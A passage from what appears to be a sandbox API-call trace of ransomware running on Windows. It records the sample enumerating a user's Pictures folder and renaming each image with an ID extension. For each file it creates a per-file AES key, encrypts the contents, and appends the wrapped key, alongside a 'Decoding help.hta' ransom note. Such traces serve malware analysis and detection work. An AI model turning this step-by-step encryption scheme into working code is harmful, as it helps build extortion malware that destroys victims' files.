HALPmcxz\\Pictures\\2m0jDWJRbuSJx.bmp.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.972] FindNextFileW (in: hFindFile=0x5a5cf0, lpFindFileData=0xec0fd30 | out: lpFindFileData=0xec0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbca23c0, ftCreationTime.dwHighDateTime=0x1d4c878, ftLastAccessTime.dwLowDateTime=0xb82de3a0, ftLastAccessTime.dwHighDateTime=0x1d4ca95, ftLastWriteTime.dwLowDateTime=0xb82de3a0, ftLastWriteTime.dwHighDateTime=0x1d4ca95, nFileSizeHigh=0x0, nFileSizeLow=0xdfd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="4HVv8.jpg", cAlternateFileName="")) returned 1 [0046.972] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0046.972] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned 46 [0046.972] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta" [0046.972] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\decoding help.hta")) returned 0x1 [0046.972] lstrcmpiW (lpString1="Decoding help.hta", lpString2="4HVv8.jpg") returned 1 [0046.972] lstrlenW (lpString="4HVv8.jpg") returned 9 [0046.972] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0046.972] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned 46 [0046.972] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="4HVv8.jpg" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4HVv8.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4HVv8.jpg" [0046.972] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4HVv8.jpg" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4HVv8.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4HVv8.jpg" [0046.972] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4HVv8.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4HVv8.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4HVv8.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0046.972] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4HVv8.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4hvv8.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4HVv8.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4hvv8.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4HVv8.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4hvv8.jpg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0046.973] CreateFileMappingA (hFile=0x3e4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3e8 [0046.973] CryptAcquireContextA (in: phProv=0xec0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xec0fcec*=0x34493e0) returned 1 [0046.974] CryptGenKey (in: hProv=0x34493e0, Algid=0x6610, dwFlags=0x1, phKey=0xec0fce8 | out: phKey=0xec0fce8*=0x5d8690) returned 1 [0046.974] CryptExportKey (in: hKey=0x5d8690, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xec0fbe4, pdwDataLen=0xec0fce4 | out: pbData=0xec0fbe4*, pdwDataLen=0xec0fce4*=0x2c) returned 1 [0046.974] MapViewOfFile (hFileMappingObject=0x3e8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdfc0) returned 0x25b0000 [0046.976] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xec0fbe4*, pdwDataLen=0xec0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xec0fbe4*, pdwDataLen=0xec0fcf8*=0x100) returned 1 [0046.976] CryptEncrypt (in: hKey=0x5d8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x25b0000, pdwDataLen=0xec0fce4*=0xdfc0, dwBufLen=0xdfc0 | out: pbData=0x25b0000*, pdwDataLen=0xec0fce4*=0xdfc0) returned 1 [0046.977] UnmapViewOfFile (lpBaseAddress=0x25b0000) returned 1 [0046.979] CloseHandle (hObject=0x3e8) returned 1 [0046.979] CryptDestroyKey (hKey=0x5d8690) returned 1 [0046.979] CryptReleaseContext (hProv=0x34493e0, dwFlags=0x0) returned 1 [0046.979] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.979] WriteFile (in: hFile=0x3e4, lpBuffer=0xec0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xec0fcf8, lpOverlapped=0x0 | out: lpBuffer=0xec0fbe4*, lpNumberOfBytesWritten=0xec0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.980] WriteFile (in: hFile=0x3e4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xec0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xec0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.980] CloseHandle (hObject=0x3e4) returned 1 [0046.981] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4HVv8.jpg.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.983] FindNextFileW (in: hFindFile=0x5a5cf0, lpFindFileData=0xec0fd30 | out: lpFindFileData=0xec0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3d92d60, ftCreationTime.dwHighDateTime=0x1d4d0ee, ftLastAccessTime.dwLowDateTime=0xf147f580, ftLastAccessTime.dwHighDateTime=0x1d4d090, ftLastWriteTime.dwLowDateTime=0xf147f580, ftLastWriteTime.dwHighDateTime=0x1d4d090, nFileSizeHigh=0x0, nFileSizeLow=0x129fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="9Ji7in8ccV.bmp", cAlternateFileName="9JI7IN~1.BMP")) returned 1 [0046.984] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0046.984] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned 46 [0046.984] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta" [0046.984] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\decoding help.hta")) returned 0x1 [0046.984] lstrcmpiW (lpString1="Decoding help.hta", lpString2="9Ji7in8ccV.bmp") returned 1 [0046.984] lstrlenW (lpString="9Ji7in8ccV.bmp") returned 14 [0046.984] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0046.984] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned 46 [0046.984] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="9Ji7in8ccV.bmp" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9Ji7in8ccV.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9Ji7in8ccV.bmp" [0046.984] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9Ji7in8ccV.bmp" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9Ji7in8ccV.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9Ji7in8ccV.bmp" [0046.984] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9Ji7in8ccV.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9Ji7in8ccV.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9Ji7in8ccV.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0046.984] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9Ji7in8ccV.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\9ji7in8ccv.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9Ji7in8ccV.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\9ji7in8ccv.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9Ji7in8ccV.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\9ji7in8ccv.bmp.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0046.985] CreateFileMappingA (hFile=0x3e4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3e8 [0046.985] CryptAcquireContextA (in: phProv=0xec0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xec0fcec*=0x34493e0) returned 1 [0046.986] CryptGenKey (in: hProv=0x34493e0, Algid=0x6610, dwFlags=0x1, phKey=0xec0fce8 | out: phKey=0xec0fce8*=0x5d8550) returned 1 [0046.986] CryptExportKey (in: hKey=0x5d8550, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xec0fbe4, pdwDataLen=0xec0fce4 | out: pbData=0xec0fbe4*, pdwDataLen=0xec0fce4*=0x2c) returned 1 [0046.986] MapViewOfFile (hFileMappingObject=0x3e8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x129e0) returned 0x3210000 [0046.987] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xec0fbe4*, pdwDataLen=0xec0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xec0fbe4*, pdwDataLen=0xec0fcf8*=0x100) returned 1 [0046.987] CryptEncrypt (in: hKey=0x5d8550, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3210000, pdwDataLen=0xec0fce4*=0x129e0, dwBufLen=0x129e0 | out: pbData=0x3210000*, pdwDataLen=0xec0fce4*=0x129e0) returned 1 [0046.989] UnmapViewOfFile (lpBaseAddress=0x3210000) returned 1 [0046.991] CloseHandle (hObject=0x3e8) returned 1 [0046.991] CryptDestroyKey (hKey=0x5d8550) returned 1 [0046.991] CryptReleaseContext (hProv=0x34493e0, dwFlags=0x0) returned 1 [0046.991] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.991] WriteFile (in: hFile=0x3e4, lpBuffer=0xec0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xec0fcf8, lpOverlapped=0x0 | out: lpBuffer=0xec0fbe4*, lpNumberOfBytesWritten=0xec0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.992] WriteFile (in: hFile=0x3e4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xec0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xec0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.992] CloseHandle (hObject=0x3e4) returned 1 [0046.993] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9Ji7in8ccV.bmp.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0051.147] FindNextFileW (in: hFindFile=0x5a5cf0, lpFindFileData=0xec0fd30 | out: lpFindFileData=0xec0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef78db70, ftCreationTime.dwHighDateTime=0x1d4d03b, ftLastAccessTime.dwLowDateTime=0xa1d83a60, ftLastAccessTime.dwHighDateTime=0x1d4cc66, ftLastWriteTime.dwLowDateTime=0xa1d83a60, ftLastWriteTime.dwHighDateTime=0x1d4cc66, nFileSizeHigh=0x0, nFileSizeLow=0x178df, dwReserved0=0x0, dwReserved1=0x0, cFileName="A-9cM BXVeEMzGTKSPE.png", cAlternateFileName="A-9CMB~1.PNG")) returned 1 [0051.147] lstrcpyW (in: lpString1=0x11173bc8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0051.147] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned 46 [0051.147] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta" [0051.147] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\decoding help.hta")) returned 0x1 [0051.147] lstrcmpiW (lpString1="Decoding help.hta", lpString2="A-9cM BXVeEMzGTKSPE.png") returned 1 [0051.147] lstrlenW (lpString="A-9cM BXVeEMzGTKSPE.png") returned 23 [0051.147] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0051.147] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned 46 [0051.147] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="A-9cM BXVeEMzGTKSPE.png" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A-9cM BXVeEMzGTKSPE.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A-9cM BXVeEMzGTKSPE.png" [0051.147] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A-9cM BXVeEMzGTKSPE.png" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A-9cM BXVeEMzGTKSPE.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A-9cM BXVeEMzGTKSPE.png" [0051.147] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A-9cM BXVeEMzGTKSPE.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A-9cM BXVeEMzGTKSPE.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A-9cM BXVeEMzGTKSPE.png.[ID]g9uZrLhJaygpwRm1[ID]" [0051.147] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A-9cM BXVeEMzGTKSPE.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\a-9cm bxveemzgtkspe.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A-9cM BXVeEMzGTKSPE.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\a-9cm bxveemzgtkspe.png.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0056.454] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A-9cM BXVeEMzGTKSPE.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\a-9cm bxveemzgtkspe.png.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b4 [0056.454] CreateFileMappingA (hFile=0x6b4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x70c [0056.454] CryptAcquireContextA (in: phProv=0xec0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xec0fcec*=0x3448f18) returned 1 [0059.900] CryptGenKey (in: hProv=0x3448f18, Algid=0x6610, dwFlags=0x1, phKey=0xec0fce8 | out: phKey=0xec0fce8*=0x5da338) returned 1 [0059.900] CryptExportKey (in: hKey=0x5da338, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xec0fbe4, pdwDataLen=0xec0fce4 | out: pbData=0xec0fbe4*, pdwDataLen=0xec0fce4*=0x2c) returned 1 [0059.900] MapViewOfFile (hFileMappingObject=0x70c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x178c0) returned 0x550000 [0059.902] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xec0fbe4*, pdwDataLen=0xec0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xec0fbe4*, pdwDataLen=0xec0fcf8*=0x100) returned 1 [0059.902] CryptEncrypt (in: hKey=0x5da338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x550000, pdwDataLen=0xec0fce4*=0x178c0, dwBufLen=0x178c0 | out: pbData=0x550000*, pdwDataLen=0xec0fce4*=0x178c0) returned 1 [0059.904] UnmapViewOfFile (lpBaseAddress=0x550000) returned 1 [0059.907] CloseHandle (hObject=0x70c) returned 1 [0059.907] CryptDestroyKey (hKey=0x5da338) returned 1 [0059.907] CryptReleaseContext (hProv=0x3448f18, dwFlags=0x0) returned 1 [0059.907] SetFilePointerEx (in: hFile=0x6b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.907] WriteFile (in: hFile=0x6b4, lpBuffer=0xec0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xec0fcf8, lpOverlapped=0x0 | out: lpBuffer=0xec0fbe4*, lpNumberOfBytesWritten=0xec0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.320] WriteFile (in: hFile=0x6b4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xec0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xec0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.320] CloseHandle (hObject=0x6b4) returned 1 [0061.320] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A-9cM BXVeEMzGTKSPE.png.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.320] FindNextFileW (in: hFindFile=0x5a5cf0, lpFindFileData=0xec0fd30 | out: lpFindFileData=0xec0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46ae26a0, ftCreationTime.dwHighDateTime=0x1d4c972, ftLastAccessTime.dwLowDateTime=0x1897b500, ftLastAccessTime.dwHighDateTime=0x1d4cecd, ftLastWriteTime.dwLowDateTime=0x1897b500, ftLastWriteTime.dwHighDateTime=0x1d4cecd, nFileSizeHigh=0x0, nFileSizeLow=0x16fae, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bz42-IB AErCL3w-.jpg", cAlternateFileName="BZ42-I~1.JPG")) returned 1 [0061.320] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0061.321] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned 46 [0061.321] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta" [0061.321] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\decoding help.hta")) returned 0x1 [0061.321] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Bz42-IB AErCL3w-.jpg") returned 1 [0061.321] lstrlenW (lpString="Bz42-IB AErCL3w-.jpg") returned 20 [0061.321] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0061.321] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned 46 [0061.321] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="Bz42-IB AErCL3w-.jpg" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz42-IB AErCL3w-.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz42-IB AErCL3w-.jpg" [0061.321] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz42-IB AErCL3w-.jpg" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz42-IB AErCL3w-.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz42-IB AErCL3w-.jpg" [0061.321] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz42-IB AErCL3w-.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz42-IB AErCL3w-.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz42-IB AErCL3w-.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0061.321] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz42-IB AErCL3w-.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz42-ib aercl3w-.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz42-IB AErCL3w-.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz42-ib aercl3w-.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz42-IB AErCL3w-.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz42-ib aercl3w-.jpg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b4 [0061.322] CreateFileMappingA (hFile=0x6b4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x950 [0061.322] CryptAcquireContextA (phProv=0xec0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 191 os_tid = 0x878 [0040.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*.*", lpFindFileData=0x688fd30 | out: lpFindFileData=0x688fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, 